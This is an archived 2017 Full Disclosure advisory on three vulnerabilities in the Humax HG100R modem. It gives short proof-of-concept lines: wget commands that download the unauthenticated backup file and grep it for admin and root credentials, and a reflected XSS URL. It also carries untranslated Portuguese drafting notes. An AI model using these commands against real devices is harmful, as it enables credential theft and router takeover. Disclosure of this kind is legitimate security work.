[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] Humax Digital HG100R multiple vulnerabilities

To: <fulldisclosure@xxxxxxxxxxxx>
Subject: [FD] Humax Digital HG100R multiple vulnerabilities
From: The Gambler <gambler@xxxxxxxxxxxx>
Date: Thu, 29 Jun 2017 23:11:56 +0200 (CEST)

Humax Digital HG100R multiple vulnerabilities
Device: Humax HG100R
Software Version: VER 2.0.6

- Backup file download (CVE-2017-7315)
An issue was discovered on Humax Digital HG100R 2.0.6 devices, a modem commonly 
used by ISPs to provide ADSL internet service to household and small business 
users. (CHECA ESSA INFO)
To download the backup file it's not required the use of credentials or any 
authentication, and the router credentials are stored in plaintext inside the 
backup.

PoC
wget http://192.168.0.1/view/basic/GatewaySettings.bin
strings GatewaySettings.bin | grep -A 1 admin
--------------------------------------------------------------------------------

- XSS Reflected(CVE-2017-7316)
An issue was discovered on Humax Digital HG100R 2.0.6 devices. DESCREVE 
BREVEMENTE O QUE É XSS REFLECTED E FALA O QUE PODE FAZER COM O USUÁRIO USANDO 
ISSO.
There is XSS reflected on the 404 page.

PoC
http://192.168.0.1<script>alert('XSS')</script>
--------------------------------------------------------------------------------

- Default credentials to router's web application not declared in the 
manual(CVE-2017-7317) NÃO ENTENDI ESSA FRASE. QUE QUIS DIZER?
An issue was discovered on Humax Digital HG100 2.0.6 devices.
The attacker can find the root credentials in the backup file.

PoC
wget http://192.168.0.1/view/basic/GatewaySettings.bin
strings GatewaySettings.bin | grep -A 1 root


Timeline
2017-03-15 - First contact. Ignored by the vendor.
2017-03-21 - Second contact.
2017-03-22 - The vendor answered asking about the vulnerability.
2017-03-27 - Asked the vendor about his security team contact informarion to 
report the vulnerability.
2017-03-28 - The vendor answered saying that it is an old product, and they 
will check this vulnerabilities in the news products.
2017-03-28 - Ask the vendor about a patch.
2017-03-30 - Ask the vendor again about the patch.
2017-04-03 - Notified the vendor about the disclousure after 90 days, even 
without a patch.
2017-04-19 - Ask the vendor about a patch.
2017-05-08 - Ask the vendor about a patch.
2017-06-29 - Disclosure.


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Next by Date: [FD] Microsoft Dynamic CRM 2016 - Cross-Site Scripting vulnerability
Next by thread: [FD] Microsoft Dynamic CRM 2016 - Cross-Site Scripting vulnerability
Index(es):
- Date
- Thread